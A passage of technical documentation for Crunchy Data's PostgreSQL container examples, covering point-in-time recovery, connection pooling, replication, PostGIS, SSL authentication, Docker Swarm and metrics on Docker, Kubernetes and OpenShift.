these environment variables, then the PITR logic will assume you want to\nrestore using all the WAL files or essentially the last known recovery point.\n\nThe `RECOVERY_TARGET_INCLUSIVE` environment variable is also available to\nlet you control the setting of the `recovery.conf` setting `recovery_target_inclusive`.\nIf you do not set this environment variable the default is *true*.\n\nOnce you recover a database using PITR, it will be in read-only mode. To\nmake the database resume as a writable database, run the following SQL command:\n....\npostgres=# select pg_wal_replay_resume();\n....\n\n{{% notice tip %}}\nIf you're running the PITR example for *PostgreSQL versions 9.5 or 9.6*, please note that\nstarting in PostgreSQL version 10, the `pg_xlog` directory was renamed to `pg_wal`. Additionally, all usages\nof the function `pg_xlog_replay_resume` were changed to `pg_wal_replay_resume`.\n{{% \/notice %}}\n\nIt takes about 1 minute for the database to become ready for use after initially starting.\n\n{{% notice warning %}}\nWAL segment files are written to the *\/tmp* directory. Leaving the example running\nfor a long time could fill up your \/tmp directory.\n{{% \/notice %}}\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate a database container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pitr\n.\/run-pitr.sh\n....\n\nNext, we will create a base backup of that database using this:\n....\n.\/run-backup-pitr.sh\n....\n\nAfter creating the base backup of the database, WAL segment files are created every 60 seconds\nthat contain any database changes. These segments are stored in the\n`\/tmp\/pitr\/pitr\/pg_wal` directory.\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments. These labels can be\nused to mark the points in the recovery process that will be referenced when\ncreating the restored database.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\ndocker stop pitr\n....\n\nNext, let's edit the restore script to use the base backup files\ncreated in the step above. You can view the backup path name\nunder the `\/tmp\/backups\/pitr-backups\/` directory. You will see\nanother directory inside of this path with a name similar to\n`2018-03-21-21-03-29`. Copy and paste that value into the\n`run-restore-pitr.sh` script in the `BACKUP` environment variable.\n\nAfter that, run the script.\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nThe WAL segments are read and applied when restoring from the database\nbackup. At this point, you should be able to verify that the\ndatabase was restored to the point before creating the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\n....\n\nThis SQL command should show that the pitrtest table does not exist\nat this recovery time. The output should be similar to:\n....\nERROR: relation \"pitrtest\" does not exist\n....\n\nPostgreSQL allows you to pause the recovery process if the target name\nor time is specified. This pause would allow a DBA a chance to review\nthe recovery time\/name and see if this is what they want or expect. If so,\nthe DBA can run the following command to resume and complete the recovery:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nUntil you run the statement above, the database will be left in read-only\nmode.\n\nNext, run the script to restore the database\nto the `afterchanges` restore point. Update the `RECOVERY_TARGET_NAME` to `afterchanges`:\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nAfter this restore, you should be able to see the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nLastly, start a recovery using all of the WAL files. This will get the\nrestored database as current as possible. To do so, edit the script\nto remove the `RECOVERY_TARGET_NAME` environment setting completely:\n....\n.\/run-restore-pitr.sh\nsleep 30\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'create table foo (id int)'\n....\n\nAt this point, you should be able to create new data in the restored database\nand the test table should be present. When you recover the entire\nWAL history, resuming the recovery is not necessary to enable writes.\n\n==== Kubernetes and OpenShift\n\nStart by running the example database container:\n....\ncd $CCPROOT\/examples\/kube\/pitr\n.\/run-pitr.sh\n....\n\nThis step will create a database container, *pitr*. This\ncontainer is configured to continuously write WAL segment files\nto a mounted volume (`\/pgwal`).\n\nAfter you start the database, you will create a base backup\nusing this command:\n....\n.\/run-backup-pitr.sh\n....\n\nThis will create a backup and write the backup files to a persistent\nvolume (`\/pgbackup`).\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\n${CCP_CLI} delete pod pitr\n....\n\nNext, we will create 3 different restored database containers based\nupon the base backup and the saved WAL files.\n\nFirst, get the BACKUP_PATH created by the `backup-pitr` example by viewing the pods logs:\n\n....\n${CCP_CLI} logs backup-pitr-8sfkh | grep PATH\nThu May 10 18:07:58 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/pitr-backups\/2018-05-10-18-07-58.\n....\n\nEdit the `restore-pitr.json` file and change the `BACKUP_PATH` environment variable\nusing the path discovered above (note: `\/pgdata\/` is not required and should be excluded\nin the variable):\n\n....\n{\n \"name\": \"BACKUP_PATH\",\n \"value\": \"pitr-backups\/2018-05-10-18-07-58\"\n{\n....\n\nNext, we restore prior to the `beforechanges` recovery target. This\nrecovery point is *before* the *pitrtest* table is created.\n\nEdit the `restore-pitr.json` file, and edit the environment\nvariable to indicate we want to use the `beforechanges` recovery\npoint:\n....\n{\n \"name\": \"RECOVERY_TARGET_NAME\",\n \"value\": \"beforechanges\"\n{\n....\n\n\nThen run the following to create the restored database container:\n....\n.\/run-restore-pitr.sh\n....\n\nAfter the database has restored, you should be able to perform\na test to see if the recovery worked as expected:\n....\npsql -h restore-pitr -U postgres postgres -c 'table pitrtest'\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nThe output of these commands should show that the *pitrtest* table is not\npresent. It should also show that you can not create a new table\nbecause the database is paused in read-only mode.\n\nTo make the database resume as a writable database, run the following\nSQL command:\n....\nselect pg_wal_replay_resume();\n....\n\nIt should then be possible to write to the database:\n....\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nYou can also test that if `afterchanges` is specified, that the\n*pitrtest* table is present but that the database is still in recovery\nmode.\n\nLastly, you can test a full recovery using *all* of the WAL files, if\nyou remove the `RECOVERY_TARGET_NAME` environment variable completely.\n\nThe storage portions of this example can all be found under `$CCP_STORAGE_PATH`.\n\n== Connection Pooling\n\n=== pgBouncer\n\nCrunchy pgBouncer is a lightweight connection pooler for PostgreSQL databases.\n\nThe following examples create the following containers:\n\n * pgBouncer Primary\n * pgBouncer Replica\n * PostgreSQL Primary\n * PostgreSQL Replica\n\nIn Kubernetes and OpenShift, this example will also create:\n\n * pgBouncer Primary Service\n * pgBouncer Replica Service\n * Primary Service\n * Replica Service\n * PostgreSQL Secrets\n * pgBouncer Secrets\n\nTo cleanup the objects created by this example, run the following in the `pgbouncer` example directory:\n\n....\n.\/cleanup.sh\n....\n\n{{% notice tip %}}\nFor more information on `pgBouncer`, see the link:https:\/\/pgbouncer.github.io[official website].\n{{% \/notice %}}\n\n==== Docker\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/docker\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h 0.0.0.0 -p 6432 -U testuser\npsql -d userdb -h 0.0.0.0 -p 6433 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h 0.0.0.0 -p 6432 -U pgbouncer\npsql -d pgbouncer -h 0.0.0.0 -p 6433 -U pgbouncer\n....\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nOpenShift: If custom configurations aren't being mounted, an *emptydir* volume is required\nto be mounted at `\/pgconf`.\n{{% \/notice %}}\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/kube\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h pgbouncer-primary -p 6432 -U testuser\npsql -d userdb -h pgbouncer-replica -p 6432 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h pgbouncer-primary -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\npsql -d pgbouncer -h pgbouncer-replica -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\n....\n\n=== pgPool II\n\nAn example is provided that will run a *pgPool II* container in conjunction with the\n*primary-replica* example provided above.\n\nYou can execute both `INSERT` and `SELECT` statements after connecting to pgpool.\nThe container will direct `INSERT` statements to the primary and `SELECT` statements\nwill be sent round-robin to both the primary and replica.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the nodes that pgpool is configured for by running:\n....\npsql -h pgpool -U testuser userdb -c 'show pool_nodes'\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database.\n....\npsql -h localhost -U testuser -p 12003 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy the pgpool service:\n....\ncd $CCPROOT\/examples\/kube\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database.\n....\npsql -h pgpool -U testuser userdb\n....\n\n== Database\n\n=== Single Primary\n\nThis example starts a single PostgreSQL container and service, the most simple\nof examples.\n\nThe container creates a default database called *userdb*, a default user called *testuser*\nand a default password of *password*.\n\nFor all environments, the script additionally creates:\n\n * A persistent volume claim\n * A crunchy-postgres container named *primary*\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * A pod named *primary*\n * A service named *primary*\n * A PVC named *primary-pgdata*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nTo create the example:\n....\ncd $CCPROOT\/examples\/kube\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h primary -U postgres postgres\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this\nexample using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary\/README.md[here].\n\n=== PostgreSQL Deployment\n\nStarting in release 1.2.8, the PostgreSQL container can accept\nan environment variable named `PGDATA_PATH_OVERRIDE`. If set,\nthe `\/pgdata\/subdir` path will use a subdirectory name of your\nchoosing instead of the default which is the hostname of the container.\n\nThis example shows how a Deployment of a PostgreSQL primary is\nsupported. A pod is a deployment that uses a hostname generated by\nKubernetes; because of this, a new hostname will be defined upon\nrestart of the primary pod.\n\nFor finding the `\/pgdata` that pertains to the pod, you will need\nto specify a `\/pgdata\/subdir` name that never changes. This requirement is\nhandled by the `PGDATA_PATH_OVERRIDE` environment variable.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nThis example will create the following in your Kubernetes and OpenShift environments:\n\n * primary and replica services\n * primary-deployment deployment\n * replica-deployment statefulset\n * ConfigMap to hold a custom `postgresql.conf`, `setup.sql`, and\n `pg_hba.conf` files\n * Secrets for the primary user, superuser, and normal user to\n hold the passwords\n * Volume mount for `\/backrestrepo` and `\/pgwal`\n\nThe persisted data for the PostgreSQL primary is found under `\/pgdata\/primary-deployment`.\nIf you delete the primary pod, the deployment will create another\npod for the primary and will be able to start up immediately since\nit works out of the same `\/pgdata\/primary-deployment` data directory.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/primary-deployment\n.\/run.sh\n....\n\nTo scale the replica statefulset, run the following command:\n\n....\n${CCP_CLI?} scale --replicas=2 statefulset replica-deployment\n....\n\n{{% notice warning %}}\nThis example only creates enough Persistent Volumes for a maximum of 2 replicas.\nIf you are not using storage classes, the maximum amount of replicas this example can\nbe scaled to is 2.\n{{% \/notice %}}\n\n=== Replication\n\nThis example starts a primary and a replica pod containing a PostgreSQL database.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nFor the Docker environment, the script additionally creates:\n\n * A docker volume using the local driver for the primary\n * A docker volume using the local driver for the replica\n * A container named *primary* binding to port 12007\n * A container named *replica* binding to port 12008\n * A mapping of the PostgreSQL port 5432 within the container to the localhost port 12000\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * emptyDir volumes for persistence\n * A pod named *pr-primary*\n * A pod named *pr-replica*\n * A pod named *pr-replica-2*\n * A service named *pr-primary*\n * A service named *pr-replica*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary-replica\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -p 12007 -U testuser -W userdb\npsql -h localhost -p 12008 -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy a primary and replica database cluster:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica\n.\/run.sh\n....\n\nIt takes about a minute for the replica to begin replicating with the\nprimary. To test out replication, see if replication is underway\nwith this command:\n\n....\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'table pg_stat_replication'\n....\n\nIf you see a line returned from that query it means the primary is replicating\nto the replica. Try creating some data on the primary:\n\n....\n\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'create table foo (id int)'\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'insert into foo values (1)'\n....\n\nThen verify that the data is replicated to the replica:\n\n....\n${CCP_CLI?} exec -ti pr-replica -- psql -d postgres -c 'table foo'\n....\n\n*primary-replica-dc*\n\nIf you wanted to experiment with scaling up the number of replicas, you can run the following example:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica-dc\n.\/run.sh\n....\n\nYou can verify that replication is working using the same commands as above.\n\n....\n${CCP_CLI?} exec -ti primary-dc -- psql -d postgres -c 'table pg_stat_replication'\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this example\nusing Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary-replica\/README.md[here].\n\n=== Synchronous Replication\n\nThis example deploys a PostgreSQL cluster with a primary, a synchronous replica, and\nan asynchronous replica. The two replicas share the same service.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/sync\n.\/run.sh\n....\n\nYou can test the replication status on the primary by using the following command\nand the password *password*:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'table pg_stat_replication'\n....\n\nYou should see 2 rows; 1 for the asynchronous replica and 1 for the synchronous replica. The\n`sync_state` column shows values of async or sync.\n\nYou can test replication to the replicas by first entering some data on\nthe primary, and secondly querying the replicas for that data:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'create table foo (id int)'\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'insert into foo values (1)'\npsql -h 127.0.0.1 -p 12011 -U postgres postgres -c 'table foo'\npsql -h 127.0.0.1 -p 12012 -U postgres postgres -c 'table foo'\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/sync\n.\/run.sh\n....\n\nConnect to the *primarysync* and *replicasync* databases as follows for both the\nKubernetes and OpenShift environments:\n....\npsql -h primarysync -U postgres postgres -c 'create table test (id int)'\npsql -h primarysync -U postgres postgres -c 'insert into test values (1)'\npsql -h primarysync -U postgres postgres -c 'table pg_stat_replication'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\n....\n\nThis set of queries will show you the IP address of the PostgreSQL replica\ncontainer. Note the changing IP address due to the round-robin service proxy\nbeing used for both replicas. The example queries also show that both\nreplicas are replicating successfully from the primary.\n\n=== Statefulsets\n\nThis example deploys a statefulset named *statefulset*. The statefulset\nis a new feature in Kubernetes as of version 1.5 and in OpenShift Origin as of\nversion 3.5. Statefulsets have replaced PetSets going forward.\n\nPlease view link:https:\/\/kubernetes.io\/docs\/concepts\/abstractions\/controllers\/statefulsets\/[this Kubernetes description]\nto better understand what a Statefulset is and how it works.\n\nThis example creates 2 PostgreSQL containers to form the set. At\nstartup, each container will examine its hostname to determine\nif it is the first container within the set of containers.\n\nThe first container is determined by the hostname suffix assigned\nby Kubernetes to the pod. This is an ordinal value starting with *0*.\nIf a container sees that it has an ordinal value of *0*, it will\nupdate the container labels to add a new label of:\n....\nname=$PG_PRIMARY_HOST\n....\n\nIn this example, `PG_PRIMARY_HOST` is specified as `statefulset-primary`.\n\nBy default, the containers specify a value of `name=statefulset-replica`.\n\nThere are 2 services that end user applications will use to\naccess the PostgreSQL cluster, one service (statefulset-primary) routes to the primary\ncontainer and the other (statefulset-replica) to the replica containers.\n....\n$ ${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\nkubernetes 10.96.0.1 <none> 443\/TCP 22h\nstatefulset None <none> 5432\/TCP 1h\nstatefulset-primary 10.97.168.138 <none> 5432\/TCP 1h\nstatefulset-replica 10.97.218.221 <none> 5432\/TCP 1h\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/statefulset\n.\/run.sh\n....\n\nYou can access the primary database as follows:\n....\npsql -h statefulset-primary -U postgres postgres\n....\n\nYou can access the replica databases as follows:\n....\npsql -h statefulset-replica -U postgres postgres\n....\n\nYou can scale the number of containers using this command; this will\nessentially create an additional replica database.\n....\n${CCP_CLI} scale --replicas=3 statefulset statefulset\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to\nrun this example using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/statefulset\/README.md[here].\n\n=== Geospatial (PostGIS)\n\nAn example is provided that will run a PostgreSQL with PostGIS pod and service in Kubernetes and OpenShift and a container in Docker.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the extensions that postgres-gis has enabled by running the following command and viewing the listed PostGIS packages:\n....\npsql -h postgres-gis -U testuser userdb -c '\\dx'\n....\n\nTo validate that PostGIS is installed and which version is running, run the command:\n\n....\npsql -h postgres-gis -U testuser userdb -c \"SELECT postgis_full_version();\"\n....\n\nYou should expect to see output similar to:\n\n....\npostgis_full_version\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n POSTGIS=\"2.4.2 r16113\" PGSQL=\"100\" GEOS=\"3.5.0-CAPI-1.9.0 r4084\" PROJ=\"Rel. 4.8.0, 6 March 2012\" GDAL=\"GDAL 1.11.4, released 2016\/01\/25\" LIBXML=\"2.9.1\" LIBJSON=\"0.11\" TOPOLOGY RASTER\n(1 row)\n....\n\nAs an exercise for invoking some of the basic PostGIS functionality for validation, try defining a 2D geometry point while giving inputs of\nlongitude and latitude through this command.\n\n....\npsql -h postgres-gis -U testuser userdb -c \"select ST_MakePoint(28.385200,-81.563900);\"\n....\n\nYou should expect to see output similar to:\n\n....\n st_makepoint\n--------------------------------------------\n 0101000000516B9A779C623C40B98D06F0166454C0\n(1 row)\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/postgres-gis\n.\/run.sh\n....\n\nEnter the following command to connect to the postgres-gis container that is\nmapped to your local port 12000:\n....\npsql -h localhost -U testuser -p 12000 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/postgres-gis\n.\/run.sh\n....\n\n=== Custom Configuration\n\nYou can use your own version of the SQL file `setup.sql` to customize\nthe initialization of database data and objects when the container and\ndatabase are created.\n\nThis works by placing a file named `setup.sql` within the `\/pgconf` mounted volume\ndirectory. Portions of the `setup.sql` file are required for the container\nto work; please see comments within the sample `setup.sql` file.\n\nIf you mount a `\/pgconf` volume, crunchy-postgres will look at that directory\nfor `postgresql.conf`, `pg_hba.conf`, `pg_ident.conf`, SSL server\/ca certificates and `setup.sql`.\nIf it finds one of them it will use that file instead of the default files.\n\n==== Docker\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/custom-config\n.\/run.sh\n....\n\n=== SSL Authentication\n\nThis example shows how you can configure PostgreSQL to use SSL for\nclient authentication.\n\nThe example requires SSL certificates and keys to be created. Included in\nthe examples directory is a script to create self-signed certificates (server\nand client) for the example: `$CCPROOT\/examples\/ssl-creator.sh`.\n\nThe example creates a client certificate for the user `testuser`. Furthermore,\nthe server certificate is created for the server name `custom-config-ssl`.\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config-ssl\n.\/run.sh\n....\n\nAnd the example can be run in the following directory for the Kubernetes and OpenShift environments:\n....\ncd $CCPROOT\/examples\/kube\/custom-config-ssl\n.\/run.sh\n....\n\nA required step to make this example work is to define\nin your `\/etc\/hosts` file an entry that maps `custom-config-ssl`\nto the service IP address for the container.\n\nFor instance, if your service has an address as follows:\n....\n${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\ncustom-config-ssl 172.30.211.108 <none> 5432\/TCP\n....\n\nThen your `\/etc\/hosts` file needs an entry like this:\n....\n172.30.211.108 custom-config-ssl\n....\n\nFor production Kubernetes and OpenShift installations, it will likely be preferred for DNS\nnames to resolve to the PostgreSQL service name and generate\nserver certificates using the DNS names instead of the example\nname `custom-config-ssl`.\n\nIf as a client it's required to confirm the identity of the server, `verify-full` can be\nspecified for `ssl-mode` in the connection string. This will check if the server and the\nserver certificate have the same name. Additionally, the proper connection parameters\nmust be specified in the connection string for the certificate information required to\ntrust and verify the identity of the server (`sslrootcert` and `sslcrl`), and to\nauthenticate the client using a certificate (`sslcert` and `sslkey`):\n\n....\npsql \"postgresql:\/\/testuser@custom-config-ssl:5432\/userdb?\\\nsslmode=verify-full&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nTo connect via IP, `sslmode` can be changed to `require`. This will verify the server\nby checking the certificate chain up to the trusted certificate authority, but will not\nverify that the hostname matches the certificate, as occurs with `verify-full`. The same\nconnection parameters as above can be then provided for the client and server certificate\ninformation.\n\n....\npsql \"postgresql:\/\/testuser@IP_OF_PGSQL:5432\/userdb?\\\nsslmode=require&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nYou should see a connection that looks like the following:\n....\npsql (10.5)\nSSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)\nType \"help\" for help.\n\nuserdb=>\n....\n\n=== Docker Swarm\n\nThis example shows how to run a primary and replica database\ncontainer on a Docker Swarm (v.1.12) cluster.\n\nFirst, set up a cluster. The Kubernetes libvirt coreos cluster\nexample works well; see link:http:\/\/kubernetes.io\/docs\/getting-started-guides\/libvirt-coreos\/[coreos-libvirt-cluster.]\n\nNext, on each node, create the Swarm using these\nlink:https:\/\/docs.docker.com\/engine\/swarm\/swarm-tutorial\/create-swarm\/[Swarm Install instructions.]\n\nInclude this command on the manager node:\n....\ndocker swarm init --advertise-addr 192.168.10.1\n....\n\nThen this command on all the worker nodes:\n....\n docker swarm join \\\n --token SWMTKN-1-65cn5wa1qv76l8l45uvlsbprogyhlprjpn27p1qxjwqmncn37o-015egopg4jhtbmlu04faon82u \\\n 192.168.10.1.37\n....\n\nBefore creating Swarm services, it is necessary\nto define an overlay network to be used by the services you will\ncreate. This can be done as follows:\n....\ndocker network create --driver overlay crunchynet\n....\n\nWe want to have the primary database always placed on\na specific node. This is accomplished using node constraints\nas follows:\n....\ndocker node inspect kubernetes-node-1 | grep ID\ndocker node update --label-add type=primary 18yrb7m650umx738rtevojpqy\n....\n\nIn the above example, the `kubernetes-node-1` node with ID\n`18yrb7m650umx738rtevojpqy` has a user defined label of *primary* added to it.\nThe primary service specifies *primary* as a constraint when created; this\ntells Swarm to place the service on that specific node. The replica specifies\na constraint of `node.labels.type != primary` to have the replica\nalways placed on a node that is not hosting the primary service.\n\n==== Docker\n\nAfter you set up the Swarm cluster, you can then run this example as follows on the *Swarm Manager Node*:\n....\ncd $CCPROOT\/examples\/docker\/swarm-service\n.\/run.sh\n....\n\nYou can then find the nodes that are running the primary and replica containers\nby:\n....\ndocker service ps primary\ndocker service ps replica\n....\n\nYou can also scale up the number of *replica* containers.\n....\ndocker service scale replica=2\ndocker service ls\n....\n\nVerify you have two replicas within PostgreSQL by viewing the `pg_stat_replication` table.\nThe password is *password* by default when logged into the `kubernetes-node-1` host:\n....\ndocker exec -it $(docker ps -q) psql -U postgres -c 'table pg_stat_replication' postgres\n....\n\nYou should see a row for each replica along with its replication status.\n\n== Failover\n\n=== Watch\n\nCrunchy Watch is an application wrapped in a container that watches a PostgreSQL\nprimary database and waits for a failure to occur, at which point a failover is\nperformed to promote a replica.\n\nThe crunchy-watch container, while originally part of the Container Suite, has been\nsplit out into its own project. More information on the Watch container and it's\ncapabilities can be found in the new project repository located at\nhttps:\/\/github.com\/CrunchyData\/crunchy-watch.\n\n== Metrics and Performance\n\n=== pgBadger\n\npgbadger is a PostgreSQL tool that reads the log files from a specified database\nin order to produce a HTML report that shows various PostgreSQL statistics and graphs.\nThis example runs the pgbadger HTTP server against a crunchy-postgres container and\nillustrates how to view the generated reports.\n\nThe port utilized for this tool is port 14000 for Docker environments and port 10000\nfor Kubernetes and OpenShift environments.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container will run and provide a simple HTTP\ncommand you can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/127.0.0.1:14000\/api\/badgergenerate\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container will run and provide a simple HTTP\ncommand you can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/pgbadger:10000\/api\/badgergenerate\n....\n\nYou can view the database container logs using these commands:\n....\n${CCP_CLI} logs pgbadger -c pgbadger\n${CCP_CLI} logs pgbadger -c postgres\n....\n\n=== Metrics Collection\n\nYou can collect various PostgreSQL metrics from your database\ncontainer by running a crunchy-collect container that points\nto your database container.\n\nThis example starts up 5 containers:\n\n * Collect (crunchy-collect)\n * Grafana (crunchy-grafana)\n * PostgreSQL (crunchy-postgres)\n * Prometheus (crunchy-prometheus)\n\nEvery 5 seconds by default, Prometheus will scrape the Collect container\nfor metrics. These metrics will then be visualized by Grafana, which by default can be accessed\nwith the following credentials:\n\n* Username : *admin*\n* Password: *password*\n\nBy default, Prometheus detects which environment its running on (Docker, Kubernetes, or OpenShift Container Platform)\nand applies a default configuration. If this container is running on Kubernetes or OpenShift Container Platform,\nit will use the Kubernetes API to discover pods with the label `\"crunchy-collect\": \"true\"`.\n\nThe collect container *must* have this label to be discovered in these environments.\nAdditionally, the collect container uses a special PostgreSQL role `ccp_monitoring`.\nThis user is created by setting the `PGMONITOR_PASSWORD` environment variable on the\nPostgreSQL container.\n\nDiscovering pods requires a cluster role service account. See the\nlink:https:\/\/github.com\/crunchydata\/crunchy-containers\/blob\/master\/examples\/kube\/metrics\/metrics.json[Kubernetes and OpenShift]\nmetrics JSON file for more details.\n\nFor Docker environments 